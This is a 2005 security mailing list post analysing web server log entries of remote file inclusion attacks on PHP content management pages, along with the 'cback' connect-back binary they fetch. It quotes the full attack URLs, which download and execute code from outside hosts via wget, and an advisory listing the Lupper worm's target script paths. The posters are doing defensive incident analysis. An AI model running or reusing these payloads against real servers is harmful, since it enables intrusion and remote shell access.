[Dshield] A Couple of New Apache Hack Patterns

jayjwa jayjwa at atr2.ath.cx
Fri Dec 16 01:47:39 GMT 2005



On Wed, 14 Dec 2005, David Cary Hart wrote:

-> 1. index2.php | index.php
-> 
-> /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;.cback%20217.160.242.90%208080;echo%20YYY;echo|HTTP/1.1"
-> 302 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT5.1;)"
-> 
-> or;
-> 
-> /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo|
-> HTTP/1.1" 301 562 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
-> 5.1;)"
-> 
-> 
-> 2. POST directly to the form mail php processing page. In other words,
-> something like contact.php is passed to, and processed by
-> ContactProc.php. The would-be spammer-hacker-miscreant is trying to
-> forward mail by eliminating the form entry page.
-> 
-> The strategy I am using these days is to SWATCH the patterns -> rewrite
-> rule to hacker.php -> firewall rule. The purpose of the interim
-> hacker.php is to provide information just in case of a false positive.
-> Hacker.php then writes a unique line to access_log which swatch
-> recognizes to trigger the firewall rule.


You didn't try the mod_security? http://www.modsecurity.org/





Wow! A new linux virus? ->


cback -> Infection: Unix/Lupper.C (exact)


The last "cback" I saw was a connect-back Perl script. This is obviously an 
ELF file.


Hmmm, now that I look at it, it's little more than a mini connect proxy. It 
takes two parameters: "%s <host> <port>\n" , forks and passes on the 
connection. I'd imagine it's used by spammers to make the mail connection look 
like it's coming from another computer than what it really is. It doesn't 
have the same functionality as the one described here:


http://www3.ca.com/securityadvisor/virusinfo/virus.aspx?id=47980


"Lupper.C is a worm designed to spread through web servers by exploiting two
different security vulnerabilities. This variant has been distributed as
443,364-byte I386 ELF program.


Method of Distribution

Via Exploits

Lupper attempts to execute a simple set of four commands on a remote server:

   * Change folder to /tmp
   * Use Wget to download a copy of the worm named ?listen? from a particular
     hard-coded IP address
   * Modify its execution attributes
   * Execute the downloaded copy of the worm

The worm sends the above commands by exploiting the following vulnerabilities:

   * AWStats Rawlog Plugin Input Vulnerability (Bugtraq 10950)
   * XML-RPC for PHP Remote Code Execution Exploit (CAN-2005-1921) (Bugtraq
     14088)

Trying to exploit the AWStats vulnerability, the worm attempts to submit its
commands to the awstats.pl script at the following locations:

/cgi-bin/awstats/awstats.pl
/cgi-bin/awstats.pl
/awstats/awstats.pl

Trying to exploit the XML-RPC vulnerability, the worm attempts to submit its
commands to the following scripts:

/xmlsrv/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlrpc.php
/wordpress/xmlrpc.php
/phpgroupware/xmlrpc.php
/drupal/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blog/xmlrpc.php
/xmlrpc.php

Return to top


Payload

Backdoor Functionality

Lupper.C opens a UDP backdoor on port 27105."






This file is much smaller.

4172 cback (bytes)


md5sum:

4bc0f4d277d84577cf183d132523a620  cback




/lib/ld-linux.so.2
_Jv_RegisterClasses
__gmon_start__
libc.so.6
printf
connect
strerror
__strtol_internal
execl
puts
dup2
sleep
socket
inet_addr
wait
fork
__errno_location
exit
_IO_stdin_used
__libc_start_main
close
GLIBC_2.0
PTRh
ZYPhl
%s <host> <port>
socket ok
/bin/sh
error: %s
retring in 5 seconds
fork error, retyr in 5 seconds
cannot create socket, retring in 5 seconds



I got a little excited there for a second, a new linux virus would certainly 
be something. I'm so jelous of Windows!



j


More information about the list mailing list